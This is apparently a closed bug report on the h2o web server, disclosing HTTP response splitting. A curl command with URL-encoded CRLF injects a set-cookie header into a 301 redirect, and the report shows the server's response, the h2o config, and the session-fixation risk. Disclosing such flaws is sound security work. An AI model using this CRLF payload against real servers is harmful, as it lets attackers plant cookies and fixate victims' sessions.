Closed
Description
Hi,
I found out that i can do HTTP response splitting in h2o by feeding the URL with carriage return
and new line (CRLF). Example:
$ curl -I "http://fooexample.com/en/%0d%0aset-cookie:test=test"
HTTP/1.1 301 Redirected
Date: Thu, 07 Jan 2016 08:56:34 GMT
Server: h2o/1.6.0
Connection: keep-alive
location: https://fooexample.com/en/
set-cookie:test=test
content-type: text/html; charset=utf-8
the h2o config:
hosts:
"fooexample.com":
listen:
port: 80
paths:
"/":
redirect:
status: 301
url: https://fooexample.com/
"fooexample.com":
listen:
port: 443
ssl:
certificate-file: /path/to/fooexample.crt
key-file: /path/to/fooexample.key
This issue could lead to session fixation attack where an attacker could coerce a victim
into clicking a link with an injected predefined cookie
Metadata
Assignees
Labels
No labels